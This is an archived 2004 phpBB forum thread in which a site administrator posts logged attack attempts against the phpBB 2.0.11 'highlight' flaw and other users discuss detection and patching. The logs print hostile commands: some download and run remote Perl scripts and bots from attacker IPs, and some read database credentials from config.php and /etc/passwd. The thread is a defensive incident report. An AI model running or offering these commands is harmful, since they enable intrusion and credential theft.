More hack examples

The 2.0.x discussion forum has been locked; this will remain read-only. The 3.0.x discussion forum has been renamed phpBB Discussion.
rcardona
Registered User
Posts: 41
Joined: Fri Mar 26, 2004 3:57 am
Location: Austin, TX, USA

More hack examples

Post by rcardona »

Luckily I applied phpBB v2.0.11 hours before hack attempts started on our site. These are some explicit examples I've found in our logs. The locations of source IPs are interesting: Russia, Kosovo, Israel, Switzerland, Saudia Arabia, Egypt, Korea, the UK and, of course, USA.

Origin:Moscow State University, Russia
Exploit body: ls
193.232.125.10 - - 20/Nov/2004:02:12:51 -0600 Mozilla/4.0 (compatible MSIE 6.0 X11 Linux i686) Opera 7.54 en

Origin:Moscow State University, Russia
Exploit body:
ls
id
uname -a
cat config.php | grep db
193.215.89.163 - - 21/Nov/2004:08:03:20 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)


Origin:Layered Tech Inc., Dallas TX
Exploit body: ls
67.18.205.82 - - 20/Nov/2004:02:13:09 -0600 -


Origin:Pristina, Kosovo
Exploit body:
id
213.149.96.50 - - 20/Nov/2004:11:59:02 -0600 -

Origin:Pristina, Kosovo
Exploit body:
wget -P /tmp 213.149.96.50/sh.pl
perl /tmp/sh.pl
80.80.174.141 - - 20/Nov/2004:11:59:42 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0 .NET CLR 1.1.4322)


Origin:Zurich, Switzerland
Exploit body:
echo
echo ---dcha0s---
id
echo ---dcha0s---
echo
213.144.148.19 - - 21/Nov/2004:15:40:35 -0600 -


Origin:Haifa Israel
Exploit body: Value of dbname
217.132.230.81 - - 21/Nov/2004:08:25:52 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)


Origin:Castle Access Inc., San Diego CA
Exploit body:
echo SUKNAHLOHBLABEG
id
uname -a
wc -l /etc/passwd
cat /proc/version
uptime
echo SUKAENDHLOHBLA
69.43.151.31 - - 21/Nov/2004:09:03:01 -0600 Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6b


Origin:London, UK
Exploit body:
ls
id
uname -a
cat config.php | grep db
Value of: dbpasswd
62.3.32.33 - - 21/Nov/2004:18:06:49 -0600 Mozilla/4.0 (compatible MSIE 5.5 Windows 98 Win 9x 4.90)
62.3.32.34 - - 21/Nov/2004:18:06:26 -0600 Mozilla/4.0 (compatible MSIE 5.5 Windows 98 Win 9x 4.90)


Origin:Korea
Exploit body:
cd /tmp
wget http://211.115.73.198:9999/g
perl g
rm -rf g
211.115.73.198 - - 21/Nov/2004:19:11:11 -0600 Lynx/2.8.4rel.1 libwww-FM/2.14

Origin:Saudia Arabia
Exploit body: Values of dbname dbpasswd
212.138.47.11 - - 21/Nov/2004:23:00:43 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322)
212.138.47.29 - - 21/Nov/2004:23:01:38 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322)
212.138.47.29 - - 21/Nov/2004:23:01:59 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322)

Origin:Egypt:
Exploit body: Value of dbpasswd
62.139.110.160 - - [22/Nov/2004:09:10:28 -0600 Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)
Last edited by rcardona on Tue Nov 23, 2004 3:58 pm, edited 1 time in total.

Gud
Former Team Member
Posts: 597
Joined: Fri Sep 07, 2001 11:02 am

Post by Gud »

thank you howdark security for releasing a working exploit. :)

MerNion
Registered User
Posts: 83
Joined: Thu Jun 05, 2003 5:59 pm

Post by MerNion »

@ rcardona: I tried to send you a pm but it fails.. if you can send me a pm with your e-mail in order to send you something. Thanks

Einstein
Registered User
Posts: 247
Joined: Sat Oct 18, 2003 9:48 pm
Location: Finland
Contact:

Post by Einstein »

How can you check if your site has been hacked? What are you searching for in the log files?

rcardona
Registered User
Posts: 41
Joined: Fri Mar 26, 2004 3:57 am
Location: Austin, TX, USA

Post by rcardona »

The greater issue of detecting hacks is a long post, but if you want a short read you can look at the info at tripwire.org or its commercial counterpart at tripwire.com.

For my search on the highlight exploit, I grepped through my Apache access_log for "highlight=%" and that is how I found the most recent attempts for v.2.0.11 security fix, e.g.

grep "highlight=%" /var/log/httpd/access_log

troubleshoot
Registered User
Posts: 4
Joined: Sat Nov 20, 2004 10:37 pm

Post by troubleshoot »

Has anybody here seen what happens when one is vulnerable though?

I found a zombie bot (perl script, logged into an IRC server in Japan) that was launched via apache (showed up as a child process). There was nothing in the access logs showing use of the highlight exploit, but I really don't see any other way they could have got in.

I did find the output from a successful wget process in my apache error logs though.

Code: Select all

--17:41:15--  http://219.254.35.93:9999/bot
           => `bot'
Connecting to 219.254.35.93:9999... connected.
HTTP request sent, awaiting response... 200 Ok
Length: 18,560 [text/plain]

    0K .......... ........                                   100%   11.96 KB/s

17:41:17 (11.96 KB/s) - `bot' saved [18560/18560]

sh: ypcat: command not found
I am thinking that when the highlight exploit is successful, it does not show up in the access logs. Can anyone else confirm?

User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

Even if the exploit is successful, you should still see it in your logs.
Proven Offensive Security Expertise. OSCP - GXPN

Technodreamer
Registered User
Posts: 42
Joined: Fri Apr 02, 2004 10:59 am

Post by Technodreamer »

I read about this how dark thing just today. I agree with PHPBB, they were not right for potentialy risking several thousand forums on the internet.

I think PHPBB was right to take the howdark issue seriously, and take the correct measures to prevent damage to themselves, and therefore the other PHPBB communities on the internet.

However, it seems the issues is closed. So don't let me start something up again.

Anyway, I hate hackers who are out to cause damage. I hope you can repare the damage if any was caused.

scraptas
Registered User
Posts: 13
Joined: Sun Oct 17, 2004 7:47 pm

Post by scraptas »

question for Techie _mike

When talking about access logs, is everyone referring to website access logs or db access logs? :oops: Sorry if this is a stupid question...I believe I may have sent phpBB the wrong access log files. I sent what I could find...

Apologies if I did send the wrong access log file. :oops: lmk please.
thanks

User avatar
Arty
Former Team Member
Posts: 16654
Joined: Wed Mar 06, 2002 2:36 pm
Name: Vjacheslav Trushkin
Contact:

Post by Arty »

He's talking about website access logs.

And there is no point in sending your logs to phpBB team - they won't do anything for you. There are hudnreds of script kiddies who thanks to howdark idiots are now trying to exploit every forum they can google.

If you got hacked then just get over it and update to 2.0.11.
Vjacheslav Trushkin / Arty.
Free phpBB 3.1 styles | New project: Iconify - modern SVG framework

User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

CyberAlien wrote: He's talking about website access logs.

And there is no point in sending your logs to phpBB team - they won't do anything for you. There are hudnreds of script kiddies who thanks to howdark idiots are now trying to exploit every forum they can google.

If you got hacked then just get over it and update to 2.0.11.
CyberAlien: Whatever you have against us, you need to get over it. I asked for the access logs for a reason, a reason you need not concern yourself with.

scraptas: PM either myself, Neothermic, or Graham.
Proven Offensive Security Expertise. OSCP - GXPN

User avatar
Arty
Former Team Member
Posts: 16654
Joined: Wed Mar 06, 2002 2:36 pm
Name: Vjacheslav Trushkin
Contact:

Post by Arty »

8O I have absolutely nothing against you. I just didn't see message where you asked for access logs and thought user just wanted to send logs to someone from team hoping someone will parse logs for him. I'm sorry for this misunderstanding.
Vjacheslav Trushkin / Arty.
Free phpBB 3.1 styles | New project: Iconify - modern SVG framework

User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

CyberAlien wrote: 8O I have absolutely nothing against you. I just didn't see message where you asked for access logs and thought user just wanted to send logs to someone from team hoping someone will parse logs for him. I'm sorry for this misunderstanding.
My apologies then. Cheers. :)
Proven Offensive Security Expertise. OSCP - GXPN

scraptas
Registered User
Posts: 13
Joined: Sun Oct 17, 2004 7:47 pm

Post by scraptas »

Wow..thanks for that CyberAlan...I am way over being attacked...I will never be over wanting to help bring these wacko's to justice! Get over that and yourself...read before you get too froggy and jump next time. I think the mod/tech team here can handle enforcing things around here. Apology accepted. :)

Techie-Mike~ I have sent them to Neo, thanks.

SamG
Former Team Member
Posts: 3221
Joined: Fri Aug 31, 2001 6:35 pm
Location: Beautiful Northwest Lower Michigan
Name: Sam Graf

Post by SamG »

scraptas, CyberAlien made an honest mistake, and Techie-Micheal took care of any moderating this topic required. In any case, the phpBB.com rules require members to avoid "back seat" moderating (see http://www.phpbb.com/phpBB/rules.php#rule1c ). Thanks.
We should talk less, and say more.

Locked

Return to “2.0.x Discussion”